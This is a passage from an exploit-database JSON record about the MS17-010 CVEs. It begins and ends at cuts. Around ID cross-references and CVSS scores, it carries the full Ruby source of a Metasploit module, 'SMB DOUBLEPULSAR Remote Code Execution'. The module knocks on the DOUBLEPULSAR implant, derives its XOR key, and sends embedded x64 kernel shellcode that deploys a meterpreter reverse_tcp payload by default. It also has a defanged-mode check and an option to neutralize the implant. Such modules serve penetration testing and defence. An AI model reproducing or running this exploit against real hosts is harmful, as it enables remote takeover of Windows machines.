"AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T22:22:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-20T22:22:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-21] #"}, "lastseen": "2021-10-20T22:22:29", "differentElements": ["sourceData"], "edition": 50}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "01b85a431b5d2e8d0c6915c27bd89d27", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-21T22:27:03", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": 